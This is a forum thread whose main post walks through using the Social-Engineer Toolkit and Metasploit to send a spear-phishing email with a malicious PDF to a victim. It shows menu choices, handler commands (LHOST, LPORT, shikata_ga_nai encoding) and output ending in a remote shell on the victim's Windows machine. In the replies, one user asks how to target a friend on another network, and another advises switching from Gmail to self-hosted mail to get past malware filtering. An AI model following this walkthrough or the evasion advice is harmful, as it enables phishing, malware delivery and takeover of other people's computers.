Spear-Phishing Attack Vector
#1
As mentioned previously, the spear phishing attack vector can be used to send targeted emails with malicious attachments. In this example we are going to craft an attack, integrate into GMAIL and send a malicious PDF to the victim. One thing to note is you can create and save your own templates to use for future SE attacks or you can use pre-built ones. When using SET just to note that when hitting enter for defaults, it will always be port 443 as the reverse connection back and a reverse Meterpreter.

Quote:Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7 Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1. Adobe CoolType SING Table 'uniqueName' Overflow (0day)
2. Adobe Flash Player 'newfunction' Invalid Pointer Use
3. Adobe Collab.collectEmailInfo Buffer Overflow
4. Adobe Collab.getIcon Buffer Overflow
5. Adobe JBIG2Decode Memory Corruption Exploit
6. Adobe PDF Embedded EXE Social Engineering
7. Adobe util.printf() Buffer Overflow
8. Custom EXE to VBA (sent via RAR) (RAR required)
9. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun

Enter the number you want (press enter for default): 1

1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse_TCP
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
5. Windows Meterpreter Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)

Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf

[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 1
Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1
Below is a list of available templates:

1: Baby Pics
2: Strange Internet usage from your computer
3: New Update
4: LOL...have to check this out...
5: Dan Brown's Angels & Demons
6: Computer Issue
7: Status Report

Enter the number you want to use: 7

Enter who you want to send email to: [email protected]

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1
Enter your GMAIL email address: [email protected]
Enter your password for gmail (it will not be displayed back to you):

SET has finished delivering the emails.

Do you want to setup a listener yes or no: yes
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...

msf exploit(handler) >
Once the attack is all setup, the victim opens the email and opens the PDF up:

[Image: Image001.jpg]

As soon as the victim opens the attachment up, a shell is presented back to us:

[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at
Thu Sep 09 09:58:06 -0400 2010

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3940 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

The spear-phishing attack can send to multiple people or individuals, it integrates into Google mail and can be completely customized based on your needs for the attack vector. Overall this is very effective for email spear-phishing.

cc/source : Social Engineer.

if you are using Backtrack 5 R1, its display is a bit different from these, coz Set-Tool has been updated, but this tool can still be in use.
Thanks

#2
woow..
Cool.. Angry

#3
nice bro,,
i'll try it letter Smile

#4
+1 from i .Smile
thx for the post

#5
I am subscribing to this thread for future reference.
Thanks for the post.
+1 rep from me.

#6
S.E.T is a great tool with many exploitation

very good tutorial +1 from me

#7
yes, with Set Tools we can do many things

#8
somebody please help me
when i run this tutorial, i get the problem, like this following :
set:phishing>1
set:phishing> Your gmail email address:[email protected]
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
[!] Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.
Press {return} to view error message.
(552, '5.7.0 Our system detected an illegal attachment on your message. Please\n5.7.0 visit http://support.google.com/mail/bin/answe...nswer=6590 to\n5.7.0 review our attachment guidelines. a10sm7305336paz.35')
Connection unexpectedly closed

Press <return> to continue

please help me brother", for troubleshoot this problem
i dont know what to do?
so, i ask to all brother"

#9
(10-30-2012, 03:58 PM)thecode1315 Wrote: somebody please help me
when i run this tutorial, i get the problem, like this following :
set:phishing>1
set:phishing> Your gmail email address:[email protected]
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
[!] Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.
Press {return} to view error message.
(552, '5.7.0 Our system detected an illegal attachment on your message. Please\n5.7.0 visit /mail/bin/answer.py?answer=6590 to\n5.7.0 review our attachment guidelines. a10sm7305336paz.35')
Connection unexpectedly closed

Press <return> to continue

please help me brother", for troubleshoot this problem
i dont know what to do?
so, i ask to all brother"

just like the error said, don't use gmail because it has malware detection and your attachment will be deleted at once
use your own hosted mail, if you have hosting with cpanel you will have plenty of mail address to try Smile

#10
whether the technique can be done in the area in a different IP???
I use a broadband modem example, truss I would send an email to my friend, and he is on another network??? whether it be the way??

were so ticklish, too, in the technique applies to windows xp only, or can be in windows 7???






Users browsing this thread: 1 Guest(s)